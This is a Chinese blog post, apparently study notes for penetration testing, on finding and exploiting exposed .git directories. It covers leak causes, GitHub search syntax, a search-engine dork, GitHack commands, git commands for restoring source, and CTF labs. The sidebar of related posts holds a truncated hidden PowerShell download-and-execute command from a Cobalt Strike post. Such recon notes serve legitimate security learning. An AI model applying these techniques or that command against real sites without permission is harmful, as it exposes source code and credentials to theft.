10-Git信息收集

于 2023-12-26 18:13:26 发布
阅读量145 收藏
点赞数
分类专栏: 信息收集 文章标签: git
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62978778/article/details/135228334
版权

文章目录

Git信息收集

1、什么是版本控制系统

系统代码的恢复、备份

修改仓库难以管理

整个工程直接打包,占用空间过多

Version Control System
发展阶段
  • 版本管理
    • 本地VCS
  • 协同开发
    • 文件冲突?
      • 自动合并不冲突的内容
      • 标记冲突的内容
    • 集中化的VCS
      • Centralized Version Control Systems
        • CVCS
      • 代表
        • CVS
          • Concurrent Versions System
        • SVN
  • 去中心化
    • 分布式CVS
      • Distributed Version Control System
        • DVCS
      • 代表、
        • Github、Gitlab、码云
        • Git
          • Linus Torwalds
            • BitKeeper

2、为什么Git会导致信息泄露

  • 把私有仓库/隐私文件提交到了github
  • 部署项目的时候,不小心把 .git 文件一起打包进去,放到web网站的目录下
    • .java
      • .class
        • war
    • .git有用的内容
      • .git/logs/HEAD
        • 存储了git的log信息,可以找到历史的commit项
      • .git/index
        • 缓存git add的文件,暂存区
      • .git/refs/stash
        • git stash
          • 把代码存入缓存区
      • .git/refs/heads/master
        • 记录了master的commit的hash
      • .git/objects/pack/.pack

3、Github搜索技巧

kali in:file    搜索文件中包含 kali 的代码
kali in:path    搜索路径中包含 kali 的代码
kali in:path,file    搜索路径、文件中包含 kali 的代码
shodan language:python 搜索关键字   shodan ,语言为 python 的代码
filename:config.php language:php   搜索文件名为 config.php ,且语言为 php
kali topics:>=5    标签数量大于等于 5 的
kali size:<1000    文件小于 1KB 的
kali stars:10..50  star  大于 10 小于 50 的
kali pushed:>2021-08-15   搜索在 2021 年 8 月 15 日之后提交的
kali pushed:2021-07-01..2021-08-01   搜索在此区间
kali created:>=2021-06-01   创建时间
kali pushed:<2021-08-01 -language:java   搜索在 2020 年 8 月 1 日前 push 代码且排除 java 语

4、Git信息泄露利用方式

找到.git

目录扫描

robots.txt

搜索引擎搜索

  • intitle:“Index of /.git”
把.git下载到本地

https://github.com/BugScanTeam/GitHack

  • python GitHack.py xxx.com/.git/

https://github.com/lijiejie/GitHack

https://github.com/wangyihang/githacker

https://github.com/WangWen-Albert/JGitHack

用git的命令获取内容

git log 获取提交记录

git reset --hard [log hash] 恢复到某个版本

git diff 对比版本差异

工具

https://github.com/gakki429/Git_Extract

5、案例

ctfhub技能树

Web——信息泄露——Git泄露——Log、Stash、Index

buuctf
  • 禁止套娃
  • Mark loves cat
星星程序猿
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
ocaml-git:纯OCaml Git格式和协议
02-02
2. **内存效率**:OCaml的垃圾收集机制使得ocaml-git能够高效地管理内存,尤其是在处理大型Git仓库时。 3. **纯 OCaml**:不依赖于C绑定或外部库,提高了移植性和安全性。 4. **流式处理**:ocaml-git支持流式读写,...
my-git:个人收集学习git(有关git的学习资料)的材料
02-04
Git是分布式版本控制系统,它使得开发者能够方便地追踪和协作代码变更。本资源"my-git"集合了关于Git的学习资料,旨在帮助个人深入理解和掌握这一强大的工具。在深入讲解之前,我们先简单介绍一下Git的基本概念。 ...
渗透测试之git信息收集git介绍+github使用技巧)
hmysn的博客
05-18 1234
什么是gitgit,我们叫做去中心化的版本控制软件。 大型的代码程序软件我们都是很多成员同步合作完成,但是这样就会导致出现代码被覆盖的情况,或者想要找过去版本比较困难的情况。于是就出现了版本控制系统来自动化的帮我们记录。 而去中心化的版本控制系统就是如今最常用,最成熟的代码管理方式,比如github就是去中心化的一个代码控制平台。 为什么git会导致信息泄漏 1、因为git的工作方式是把代码从本地保存后把私有仓库或者隐私文件上传到了github 2、部署项目的时候,不小心把 .git 文件一起
信息收集----目录扫描搜集与Git收集信息
qq_44418229的博客
05-03 1796
目录扫描收集信息与Git收集信息
Git信息泄露搜索的一些工具总结
weixin_40966980的博客
11-28 4716
关于Git泄露可以用到的一些项目大家自己挑 :) 1.http://gitleaks.com/  2.https://github.com/UnkL4b/GitMiner 3.https://github.com/mschwager/gitem 4.https://github.com/repoog/GitPrey 5.https://github.com/ezekg/git-houn
信息收集Github搜索语法
热门推荐
谢公子的博客
09-09 1万+
目录 使用 Github 进行邮件配置信息收集 使用Github进行数据库信息收集 使用Github进行 SVN 信息收集 使用Github进行综合信息收集 在渗透测试的信息收集阶段,可以去Github和码云上搜索与目标有关的信息,或者就有意想不到的收获。(有些开发人员将代码上传到代码库的时候,有可能连一些重要的配置信息也上传了) Github的搜素语法: in:name test...
CIsco-Facts-to-Git:从思科设备收集事实和配置,并将其推送到Git存储库
05-22
从思科设备收集事实和配置,并将它们提交/推送到Git存储库 使用Ansible将Cisco配置直接备份到Git存储库中 使用网络设备时最常见的请求之一是:“您能使路由器和/或交换机当前运行吗?” 通常,您可以执行try and ...
site:站点 - Git 问题收集器项目
06-12
Git 问题收集器项目】是一个专注于 Git 相关问题解答和学习资源的站点,它旨在帮助开发者解决在使用 Git 过程中遇到的各种难题。Git 是一个分布式版本控制系统,由 Linus Torvalds 为 Linux 内核开发,现已成为...
gh-aula-git
03-30
【描述】"gh-aula-git" 没有提供具体的描述信息,但我们可以推测这可能是GitHub上的一个学习资源,可能包含了一系列关于Git基础操作、分支管理、合并冲突、远程仓库交互等内容的教学材料。 【标签】"HTML" 提示我们...
git资料收集
alittleyatou的博客
01-24 150
解决git clone时报错:The requested URL returned error: 401 Unauthorized while accessing
Git 资料收集
AD_Li的只言片语
08-25 867
1 Git 中文教程http://www.bitsun.com/documents/gittutorcn.htm2 使用 Git 管理源代码http://www.ibm.com/developerworks/cn/linux/l-git/index.html3 Everyday GIT With 20 Commands Or Sohttp://www.kernel.org/pub/software
公司敏感信息收集-Git信息泄漏漏洞与GitHack使用方法
易编橙 · 终身成长社群,相遇已是上上签!
12-21 1408
文章目录“.git”泄漏漏洞与危害Git信息泄露原理GitHack的使用方法 Git是一个开源的分布式版本控制系统,能够有效的实现对软件版本的控制。版本控制是软件研发过程中项目的开发与管理的标准做法,能够追踪项目从开始到结束的整个过程,对企业的研发技术团队来说,是团队协作的桥梁,有助于团队多人协同。 然而在代码发布的时候,存在操作不规范的情况下可能会将代码泄漏出去,这时候攻击者就可以利用泄漏的代码信息进行白盒代码审计,发现其中存在的漏洞。甚至有的代码中会存储服务器、邮箱、数据库的配置链接信息,那么攻击者在获
git敏感信息脚本_黑客入侵系统第一步“信息收集”过程详解
weixin_39983563的博客
11-16 474
记一次黑客大牛的信息收集,不看后悔!!!1.操作系统收集方法操作系统:Windows和Linux大小写敏感 Windows大小写不敏感:如果一个文件存在大小写,名字一致,在Windows上面,它是一个文件,也就是说,不管你大写也好,小写也好,你这个文件就是一个我们的这个Windows搭建的网站,我们把网站的脚本格式asp和php改为大学的PHP或者ASP的话,返回正常就是Windows,返回不正常...
Cobaltstrike4.0系列 -- Beacon HTTP
weixin_41489908的博客
06-23 903
讲过去像是在卖惨,讲未来像是在白日做梦,讲现在又像是旁观者迷,迟迟无语,字字苦酸。。。 ---- 网易云热评 一、新建Listeners,点击save 二、利用powershell命令获取目标主机的Beacon 1、选择Attacks--WebDrive-by--ScriptedwebDelivery 2、选择添加的Listener,点击Launch 3、获取powershell的单行指令 powershell.exe -nop -w hidden -c "IEX ((ne...
git 收集
weixin_34126215的博客
02-14 64
2019独角兽企业重金招聘Python工程师标准>>> ...
git 操作收集
jean850218的博客
02-11 593
1、无法查看所有远程分支 若遇到 git branch -a 无法全部显示远程的分支,只显示master分支 可以通过 git fetch 将本地远程跟踪分支进行更新,与远程分支保持一致 2、放弃本地所有修改 git checkout . 3.放弃本地所有新增文件 git clean -xdf 4.版本回退 git reset (–mixed) HEAD~1 回退一个版本,且会将...
GitHub信息收集
quixon的专栏
09-30 1278
目录桌面版脑图(DesktopNaotu) 桌面版脑图(DesktopNaotu) GitHub链接 桌面版脑图 (百度脑图离线版,思维导图) 跨平台支持 Windows/Linux/Mac OS. (A cross-platform multilingual Mind Map Tool) 操作系统 位数 对应文件 大小 支持情况 MacOS 64位 DesktopNaotu-ma...
渗透:信息收集
weixin_43822735的博客
11-02 219
信息收集笔记分享 (几年前学习的笔记,今天翻到拿出来分享下) 1.利用搜索引擎收集信息 GoogleHacking:利用搜索引擎有针对的进行信息搜索来进行网络入侵的技术和行为。搜索引擎对于搜索关键字提供了许多语法,构造特殊关键字,利用搜索引擎的收集目标主要有以下几种: a)敏感信息 b)具备特殊URL关键字的目标地址 c)搜索已有攻击 d)指定格式文件 e)其他与某个站点相关的信息 注:搜索引擎的...
oh-my-zsh 与 oh-my-zsh-git 的区别
最新发布
09-18
oh-my-zsh-git 主要的目的是为了扩展和增强原版 oh-my-zsh 的功能,并从社区中收集和整合更多的插件和主题。 具体来说,oh-my-zsh-git 与 oh-my-zsh 的区别主要体现在以下几个方面: 1. 功能扩展:oh-my-zsh-git ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

星星程序猿

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值